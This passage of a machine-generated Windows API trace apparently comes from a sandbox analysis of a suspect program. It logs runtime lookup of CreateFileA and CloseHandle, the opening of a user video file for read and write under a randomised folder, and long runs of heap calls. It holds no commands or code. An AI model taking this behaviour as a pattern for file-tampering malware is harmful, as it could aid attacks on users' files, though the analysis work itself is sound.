cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0197.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0197.799] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0197.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0197.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0197.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0197.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0197.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0197.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0197.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0197.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9c0 [0197.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd9c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0197.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0197.799] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0197.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0197.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0197.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0197.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0197.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0197.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0197.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0197.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0197.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0197.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0197.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0197.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0197.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0197.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi", cchWideChar=109, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 109 [0197.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x6d) returned 0x906f38 [0197.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi", cchWideChar=109, lpMultiByteStr=0x906f38, cbMultiByte=109, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi", lpUsedDefaultChar=0x0) returned 109 [0197.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0197.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0197.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0197.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0197.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0197.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0197.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0197.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0197.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0197.802] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\e1y-mggtzczzg\\op gi7lihe dqiho\\vgcmna4csdu wvha.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0197.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0197.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0197.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0197.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0197.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0197.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0197.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0197.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0197.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0197.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0197.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0197.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0197.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0197.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0197.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=109, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 109 [0197.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xda) returned 0x907778 [0197.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=109, lpWideCharStr=0x907778, cchWideChar=109 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi") returned 109 [0197.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0197.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xe0) returned 0x907340 [0197.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0197.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0197.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0197.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0197.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0197.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0197.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0197.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0197.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0197.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0197.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0197.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0197.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0197.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0197.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0197.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0197.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0197.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0197.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0197.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0197.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0197.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0197.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0197.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0197.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0197.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0197.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0197.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0197.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0197.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0197.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0197.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0197.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0197.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0197.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0197.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0197.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0197.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0197.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0197.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0197.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0197.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0197.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0197.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0197.805] FreeLibrary (hLibModule=0x75990000) returned 1 [0197.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0197.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0197.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0197.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0197.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0197.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0197.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0197.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0197.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0197.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0197.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0197.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0197.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0197.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0197.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0197.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0197.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0197.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0197.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0197.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0197.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0197.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0197.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0197.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0197.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0197.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0197.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0197.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0197.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0197.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0197.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0197.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0197.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0197.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0197.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0197.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0197.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0197.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0197.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0197.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0197.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0197.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0197.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0197.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0197.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0197.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0197.807] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0197.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0197.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0197.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0197.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0197.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0197.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0197.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0197.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0197.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0197.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0197.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0197.808] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0197.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0197.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0197.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0197.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0197.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0197.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0197.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0197.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0197.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0197.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0197.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0197.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0197.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0197.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0197.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0197.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0197.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0197.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0197.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0197.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0197.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0197.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0197.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0197.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0197.809] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0197.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0197.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0197.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0197.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0197.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0197.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0197.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0197.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0197.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0197.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0197.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0197.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0197.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0197.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0197.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0197.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0197.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0197.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0197.810] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0197.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0197.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0197.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0197.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd870 [0197.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0197.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0197.810] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0197.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0197.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0197.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0197.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0197.810] HeapFree (in: hHeap=0x8a0000, 